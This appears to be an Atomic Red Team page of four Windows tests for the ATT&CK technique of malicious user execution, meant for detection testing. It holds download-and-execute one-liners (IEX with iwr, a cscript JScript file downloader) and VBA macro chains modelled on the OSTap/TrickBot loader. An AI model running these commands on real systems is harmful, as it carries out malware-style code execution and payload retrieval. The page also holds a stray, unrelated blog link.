Try it using Invoke-Atomic

User Execution: Malicious Link

Description from ATT&CK

An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from Spearphishing Attachment. Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.

Adversaries may employ various forms of Masquerading and Obfuscated Files or Information to increase the likelihood that a user will open and successfully execute a malicious file. These methods may include using a familiar naming convention and/or password protecting the file and supplying instructions to a user on how to open it.(Citation: Password Protected Word Docs)

While Malicious File frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after Internal Spearphishing. https://www.aleksandrhovhannisyan.com/blog/how-to-add-a-copy-to-clipboard-button-to-your-jekyll-blog/

Atomic Tests

Atomic Test #1 - OSTap Style Macro Execution

This Test uses a VBA macro to create and execute #{jse_path} with cscript.exe. Upon execution, the .jse file launches wscript.exe. Execution is handled by Invoke-MalDoc to load and execute VBA code into Excel or Word documents.

This is a known execution chain observed by the OSTap downloader commonly used in TrickBot campaigns References: https://www.computerweekly.com/news/252470091/TrickBot-Trojan-switches-to-stealthy-Ostap-downloader

Supported Platforms: windows

auto_generated_guid: 8bebc690-18c7-4549-bc98-210f7019efff

Inputs:

Name Description Type Default Value
jse_path Path for the macro to write out the "malicious" .jse file    
String C:\Users\Public\art.jse    
ms_product Maldoc application Word or Excel String Word
ms_office_version Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office" String 16.0

Attack Commands: Run with powershell!

1
2
3
4
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
$macrocode = "   Open `"#{jse_path}`" For Output As #1`n   Write #1, `"WScript.Quit`"`n   Close #1`n   Shell`$ `"cscript.exe #{jse_path}`"`n"
Invoke-MalDoc $macrocode "#{ms_office_version}" "#{ms_product}"

Cleanup Commands:

1
2
3
if (Test-Path #{jse_path}) { Remove-Item #{jse_path} }
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore

Dependencies: Run with powershell!

Description: Test Requires MS Office to be installed and have been run previously. Run -GetPrereqs to run msword and build dependant registry keys

Check Prereq Commands:

1
2
If (Test-Path HKCU:SOFTWARE\Microsoft\Office\#{ms_office_version}) { exit 0 } else { exit 1 }

Get Prereq Commands:

1
2
3
$msword = New-Object -ComObject word.application
Stop-Process -Name WINWORD

Atomic Test #2 - OSTap Payload Download

Uses cscript //E:jscript to download a file

Supported Platforms: windows

auto_generated_guid: 3f3af983-118a-4fa1-85d3-ba4daa739d80

Inputs:

Name Description Type Default Value
script_file File to execute jscript code from Path %TEMP%\OSTapGet.js
file_url URL to retrieve file from Url https://128.30.52.100/TR/PNG/iso_8859-1.txt

Attack Commands: Run with command_prompt!

1
2
3
echo var url = "#{file_url}", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file}
cscript //E:Jscript #{script_file}

Cleanup Commands:

1
2
del #{script_file} /F /Q >nul 2>&1

Atomic Test #3 - Maldoc choice flags command execution

This Test uses a VBA macro to execute cmd with flags observed in recent maldoc and 2nd stage downloaders. Upon execution, CMD will be launched. Execution is handled by Invoke-MalDoc to load and execute VBA code into Excel or Word documents.

Supported Platforms: windows

auto_generated_guid: 0330a5d2-a45a-4272-a9ee-e364411c4b18

Inputs:

Name Description Type Default Value
ms_product Maldoc application Word or Excel String Word
ms_office_version Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office" String 16.0

Attack Commands: Run with powershell!

1
2
3
4
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
$macrocode = "  a = Shell(`"cmd.exe /c choice /C Y /N /D Y /T 3`", vbNormalFocus)"
Invoke-MalDoc $macrocode "#{ms_office_version}" "#{ms_product}"

Cleanup Commands:

1
2
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore

Dependencies: Run with powershell!

Description: Test Requires MS Office to be installed and have been run previously. Run -GetPrereqs to run msword and build dependant registry keys

Check Prereq Commands:

1
2
If (Test-Path HKCU:SOFTWARE\Microsoft\Office\#{ms_office_version}) { exit 0 } else { exit 1 }

Get Prereq Commands:

1
2
3
$msword = New-Object -ComObject word.application
Stop-Process -Name WINWORD

Atomic Test #4 - OSTAP JS version

Malicious JavaScript executing CMD which spawns wscript.exe //e:jscript

Execution is handled by Invoke-MalDoc to load and execute VBA code into Excel or Word documents.

Supported Platforms: windows

auto_generated_guid: add560ef-20d6-4011-a937-2c340f930911

Inputs:

Name Description Type Default Value
jse_path jse file to execute with wscript Path C:\Users\Public\art.jse
ms_product Maldoc application Word or Excel String Word
ms_office_version Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office" String 16.0

Attack Commands: Run with powershell!

1
2
3
4
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
$macrocode = "   Open `"#{jse_path}`" For Output As #1`n   Write #1, `"WScript.Quit`"`n   Close #1`n   a = Shell(`"cmd.exe /c wscript.exe //E:jscript #{jse_path}`", vbNormalFocus)`n"
Invoke-MalDoc $macrocode "#{ms_office_version}" "#{ms_product}"

Cleanup Commands:

1
2
3
if (Test-Path #{jse_path}) { Remove-Item #{jse_path} }
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore

Dependencies: Run with powershell!

Description: Test Requires MS Office to be installed and have been run previously. Run -GetPrereqs to run msword and build dependant registry keys

Check Prereq Commands:

1
2
If (Test-Path HKCU:SOFTWARE\Microsoft\Office\#{ms_office_version}) { exit 0 } else { exit 1 }

Get Prereq Commands:

1
2
3
$msword = New-Object -ComObject word.application
Stop-Process -Name WINWORD

source